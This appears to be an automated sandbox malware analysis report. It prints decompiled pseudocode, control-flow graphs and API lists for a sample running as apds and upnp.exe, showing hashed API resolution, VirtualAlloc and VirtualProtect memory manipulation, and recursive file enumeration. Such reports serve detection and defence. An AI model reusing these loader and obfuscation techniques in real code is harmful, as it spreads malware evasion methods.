                                                                                			E003E7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E003E34C0(__ecx);
				if( *0x3edd1c == 0) {
					 *0x3edd1c = E003E3E60(__ebx, E003E3F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x3ee548; // 0x657de0
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x3ee494;
				if(_t7 == 0) {
					_t7 = E003E3E60(_t15, E003E3F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x3ee494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x3edf30;
				if(_t9 == 0) {
					_t9 = E003E3E60(_t15, E003E3F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x3edf30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x003e7080
                                                                                0x003e7082
                                                                                0x003e7089
                                                                                0x003e7092
                                                                                0x003e70aa
                                                                                0x003e70aa
                                                                                0x003e70b0
                                                                                0x003e70b2
                                                                                0x003e70b8
                                                                                0x003e70bc
                                                                                0x003e70c3
                                                                                0x003e70d6
                                                                                0x003e70db
                                                                                0x003e70db
                                                                                0x003e70e2
                                                                                0x003e70e4
                                                                                0x003e70eb
                                                                                0x003e70fe
                                                                                0x003e7103
                                                                                0x003e7103
                                                                                0x003e7110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003E721D,003E68AC), ref: 003E70B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: }e
                                                                                • API String ID: 1029625771-1131939568
                                                                                • Opcode ID: 4449bb853b64c0ceeea584fa211025182d9cdbbdb91f0061a87d1818c6ab5cab
                                                                                • Instruction ID: 457c94b00617875c7316674a6b8ffb5bf94ed0d44c50ee0a3fa9c49e90bc5543
                                                                                • Opcode Fuzzy Hash: 4449bb853b64c0ceeea584fa211025182d9cdbbdb91f0061a87d1818c6ab5cab
                                                                                • Instruction Fuzzy Hash: B801A2317142B54B9B27AF7B9C8472B2AAF9FD0748B100369A015CF3D5EE31DD028B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 603 3d0580-3d05be call 3d0ed0 606 3d05c0-3d05cf 603->606 607 3d05d2-3d05da 603->607 608 3d06e7-3d06ef 607->608 609 3d05e0-3d05e3 607->609 609->608 610 3d05e9-3d05eb 609->610 610->608 611 3d05f1-3d05fc 610->611 611->608 613 3d0602-3d0607 611->613 614 3d060d-3d0629 call 3d1140 RtlMoveMemory 613->614 615 3d06d8-3d06e4 613->615 618 3d062b-3d0630 614->618 619 3d0654-3d0659 614->619 620 3d0643-3d0652 618->620 621 3d0632-3d0641 618->621 622 3d066c-3d0678 619->622 623 3d065b-3d066a 619->623 624 3d0679-3d0699 call 3d1140 620->624 621->624 622->624 623->624 624->608 627 3d069b-3d06a3 VirtualProtect 624->627 628 3d06a5-3d06a8 627->628 629 3d06c6-3d06d5 627->629 628->608 630 3d06aa-3d06ad 628->630 630->608 631 3d06af-3d06b1 630->631 631->614 632 3d06b7-3d06c3 631->632
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003D061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 003D069C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: f9ad5730573c1d1c0b8711103ce9c04b600b50c7da62453a5aae67a69162a970
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 2B3156B365420657E3299A79FC85BEBA3C4DBD1B50F08483BF905D2380D52ED468C265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 633 3e5ce0-3e5cec call 3e65e0 636 3e5cee-3e5d04 call 3e3f00 call 3e3e60 633->636 637 3e5d09-3e5d0d ExitProcess 633->637 636->637
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E003E65E0();
				if( *0x3eddb8 == 0) {
					 *0x3eddb8 = E003E3E60(_t5, E003E3F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x003e5ce0
                                                                                0x003e5cec
                                                                                0x003e5d04
                                                                                0x003e5d04
                                                                                0x003e5d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 003E5D0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 32ff31d49a0811fcd3ee33b2e84d899393361ccdd81993fe135021ab8443fd55
                                                                                • Instruction ID: a208ded121661b617140d396e20823898fbdb6a8be73af8895fea1550c88e28f
                                                                                • Opcode Fuzzy Hash: 32ff31d49a0811fcd3ee33b2e84d899393361ccdd81993fe135021ab8443fd55
                                                                                • Instruction Fuzzy Hash: 29D0C9217442A446DA56ABB65C8A76B269B4FE0748F104219E011CF2D6EE208920A750
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 642 3d0ad0-3d0b31 call 3d0ed0 645 3d0b47-3d0b4d 642->645 646 3d0b33-3d0b42 642->646 648 3d0b5f-3d0b7b 645->648 649 3d0b4f-3d0b54 645->649 647 3d0d40 646->647 651 3d0b7d-3d0b8e 648->651 652 3d0b90 648->652 649->648 653 3d0b96-3d0b9c 651->653 652->653 654 3d0bae-3d0bca 653->654 655 3d0b9e-3d0ba3 653->655 658 3d0bcc-3d0bd4 654->658 659 3d0bd7-3d0c21 VirtualAlloc 654->659 655->654 658->659 663 3d0d1a-3d0d24 659->663 664 3d0c27-3d0c2e 659->664 663->647 665 3d0c44-3d0c4b 664->665 666 3d0c30-3d0c3f 664->666 667 3d0c5d-3d0c79 665->667 668 3d0c4d-3d0c52 665->668 666->647 670 3d0c7b-3d0c83 667->670 671 3d0c86-3d0c8d 667->671 668->667 670->671 672 3d0c9f-3d0cbb 671->672 673 3d0c8f-3d0c94 671->673 675 3d0cbd-3d0cc5 672->675 676 3d0cc8-3d0cfa VirtualAlloc 672->676 673->672 675->676 679 3d0d02-3d0d07 676->679 679->663 680 3d0d09-3d0d18 679->680 680->647
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 003D0BFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 1f3da323facaf34157dea2bf32b08612cbf99ecb483a9a545b8e83f129c9b151
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 7D513871640218ABDB248F54DE45FEAB778EF14B01F004096FA08BB290D7B89D85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E42C0, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E003E42C0(void* __ebx, long __ecx) {
				intOrPtr* _t1;
				void* _t4;
				void* _t16;
				long _t17;
				void* _t18;

				_t8 = __ebx;
				_t1 =  *0x3ee494;
				_t17 = __ecx;
				if(_t1 == 0) {
					_t1 = E003E3E60(__ebx, E003E3F00(0x9bab0b12), 0x7facde30, _t18);
					 *0x3ee494 = _t1;
				}
				_t16 =  *_t1();
				if( *0x3edd18 == 0) {
					 *0x3edd18 = E003E3E60(_t8, E003E3F00(0x9bab0b12), 0x9ff0609c, _t18);
				}
				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
				return _t4;
			}








                                                                                0x003e42c0
                                                                                0x003e42c0
                                                                                0x003e42c6
                                                                                0x003e42cb
                                                                                0x003e42de
                                                                                0x003e42e3
                                                                                0x003e42e3
                                                                                0x003e42ea
                                                                                0x003e42f3
                                                                                0x003e430b
                                                                                0x003e430b
                                                                                0x003e4314
                                                                                0x003e4318

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 003E4314
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: fac4b7c6947c89d85dbf10c48c230bd8e01b2f2d3b9e9f07b9dac6859c900843
                                                                                • Instruction ID: b558490197cbae86e288b13f37c2f75b4ef53959f9a89ed9507233ebf1524ceb
                                                                                • Opcode Fuzzy Hash: fac4b7c6947c89d85dbf10c48c230bd8e01b2f2d3b9e9f07b9dac6859c900843
                                                                                • Instruction Fuzzy Hash: 9EE06531B042B5579B26ABBFAC85A7B269F8FD4744B110669B000CF3D5ED218D025790
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 003D02F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: a7f04150ab309e2705018e92eaecd6225cbe348b236398991abf62e17ef9dbe8
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: AB513AB1901268ABDB24DF64DD84BDEB778EF88700F00459AF509BB250DB745A85CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 003D0010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 8be4295d5710e5e95664277dc7a3a0c03271423b3b459dc1fae1264883e3a5b7
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: B3311A39E511289BCB04DB98DD80AED7BB5FF48740F50802BD502737A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D06F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: ceae101b0aeaea2a6e8e5be104fb24c8c72ab36fb21e17cc3545f7d2b9fdb235
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: AC51A373A043016BD72ADF26E841B5BB7E8EBD4B94F04452FF548EB341E235D90497A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D08F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: 9859ed181ec90d29d9bbe07d3ea3eb9b1b0aee7ac33e3fd9302266de2a383c35
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: 124104776143026BC31ADB79EC45BABB399ABC4F50F09492FF640DA344D2B0D50887AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: upnp.exe PID: 1788 Parent PID: 2336 upnp.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00300400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00300448
                                                                                  • Part of subcall function 00301140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00300EFD,00000000), ref: 00301155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00300463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00300484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0030048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00300492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0030049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 003004A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 003004B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 003004E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 003004F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00300519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00300530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00300547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00300562
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: bd6d67fd80635cc30b5d562869b7c1e13c391ec385e5c943ca6cb9ce5c289ac1
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: 12415EB19053406FE719EB66C866F6FB3EDAB88740F408D1CB7849B2C1DA74D9048B62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003138F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 447 3138f0-31390b 448 313910-313915 447->448 449 313a69-313a6e 448->449 450 31391b 448->450 451 313a70-313a75 449->451 452 313acc-313adf call 3134c0 449->452 453 313921-313926 450->453 454 313a5f-313a64 450->454 455 313a77-313a7e 451->455 456 313ab6-313abb 451->456 468 313ae1-313af7 call 313f00 call 313e60 452->468 469 313afc-313b17 452->469 457 313a17-313a1e 453->457 458 31392c-313931 453->458 454->448 460 313a80-313a96 call 313f00 call 313e60 455->460 461 313a9b-313ab1 455->461 456->448 464 313ac1-313acb 456->464 462 313a20-313a36 call 313f00 call 313e60 457->462 463 313a3b-313a4f FindFirstFileW 457->463 465 313b70-313b77 458->465 466 313937-31393c 458->466 460->461 461->448 462->463 474 313a55-313a5a 463->474 475 313b97-313ba1 463->475 472 313b94 465->472 473 313b79-313b8f call 313f00 call 313e60 465->473 466->456 476 313942-313947 466->476 468->469 497 313b34-313b3f 469->497 498 313b19-313b2f call 313f00 call 313e60 469->498 472->475 473->472 474->448 482 3139f1-313a12 476->482 483 31394d-313953 476->483 482->448 484 313955-31395d 483->484 485 313974-313976 483->485 491 31396d-313972 484->491 492 31395f-313963 484->492 485->491 494 313978-31398b call 3134c0 485->494 491->448 492->485 501 313965-31396b 492->501 511 3139a8-3139ec call 3138f0 call 313460 494->511 512 31398d-3139a3 call 313f00 call 313e60 494->512 509 313b41-313b57 call 313f00 call 313e60 497->509 510 313b5c-313b6b 497->510 498->497 501->485 501->491 509->510 510->448 511->448 512->511
                                                                                C-Code - Quality: 63%
                                                                                			E003138F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x31e430 == 0) {
								 *0x31e430 = E00313E60(_t56, E00313F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x31dba4;
								if(_t42 == 0) {
									_t42 = E00313E60(_t56, E00313F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x31dba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E003134C0(0x31d290);
											_t50 =  *0x31e158;
											if(_t50 == 0) {
												_t50 = E00313E60(_t56, E00313F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x31e158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E003138F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E00313460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E003134C0(0x31d260);
					_t24 =  *0x31e158;
					if(_t24 == 0) {
						_t24 = E00313E60(_t56, E00313F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x31e158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x31e494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E00313E60(_t56, E00313F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x31e494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x31df30;
					if(_t28 == 0) {
						_t28 = E00313E60(_t56, E00313F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x31df30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x31df88;
						if(_t33 == 0) {
							_t33 = E00313E60(_t56, E00313F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x31df88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x003138fa
                                                                                0x003138fc
                                                                                0x003138fe
                                                                                0x00313902
                                                                                0x00313907
                                                                                0x00313910
                                                                                0x00313910
                                                                                0x00313910
                                                                                0x00313915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0031391b
                                                                                0x00313a5f
                                                                                0x00000000
                                                                                0x00313921
                                                                                0x00313926
                                                                                0x00313a1e
                                                                                0x00313a36
                                                                                0x00313a36
                                                                                0x00313a48
                                                                                0x00313a4a
                                                                                0x00313a4f
                                                                                0x00313ba1
                                                                                0x00313a55
                                                                                0x00313a55
                                                                                0x00000000
                                                                                0x00313a55
                                                                                0x0031392c
                                                                                0x00313931
                                                                                0x00313b70
                                                                                0x00313b77
                                                                                0x00313b8a
                                                                                0x00313b8f
                                                                                0x00313b8f
                                                                                0x00000000
                                                                                0x00313b95
                                                                                0x0031393c
                                                                                0x00313ab6
                                                                                0x00313abb
                                                                                0x00000000
                                                                                0x00313acb
                                                                                0x00313acb
                                                                                0x00313acb
                                                                                0x00313942
                                                                                0x00313947
                                                                                0x003139fd
                                                                                0x00313a06
                                                                                0x00313a0d
                                                                                0x0031394d
                                                                                0x00313953
                                                                                0x00313974
                                                                                0x00313976
                                                                                0x00000000
                                                                                0x00313978
                                                                                0x00313982
                                                                                0x00313984
                                                                                0x0031398b
                                                                                0x0031399e
                                                                                0x003139a3
                                                                                0x003139a3
                                                                                0x003139bc
                                                                                0x003139d8
                                                                                0x003139dd
                                                                                0x003139e2
                                                                                0x003139e7
                                                                                0x003139e7
                                                                                0x00313955
                                                                                0x00313955
                                                                                0x0031395d
                                                                                0x0031396d
                                                                                0x0031396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0031395d
                                                                                0x00313953
                                                                                0x00000000
                                                                                0x00313947
                                                                                0x0031393c
                                                                                0x00313926
                                                                                0x00000000
                                                                                0x0031391b
                                                                                0x00313a6e
                                                                                0x00313ad6
                                                                                0x00313ad8
                                                                                0x00313adf
                                                                                0x00313af2
                                                                                0x00313af7
                                                                                0x00313af7
                                                                                0x00313b0b
                                                                                0x00313b0d
                                                                                0x00313b12
                                                                                0x00313b17
                                                                                0x00313b2a
                                                                                0x00313b2f
                                                                                0x00313b2f
                                                                                0x00313b36
                                                                                0x00313b38
                                                                                0x00313b3f
                                                                                0x00313b52
                                                                                0x00313b57
                                                                                0x00313b57
                                                                                0x00313b60
                                                                                0x00313b62
                                                                                0x00313b66
                                                                                0x00000000
                                                                                0x00313a70
                                                                                0x00313a75
                                                                                0x00000000
                                                                                0x00313a77
                                                                                0x00313a77
                                                                                0x00313a7e
                                                                                0x00313a91
                                                                                0x00313a96
                                                                                0x00313a96
                                                                                0x00313aa1
                                                                                0x00313aa5
                                                                                0x00313aac
                                                                                0x00000000
                                                                                0x00313aac
                                                                                0x00313a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00313A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
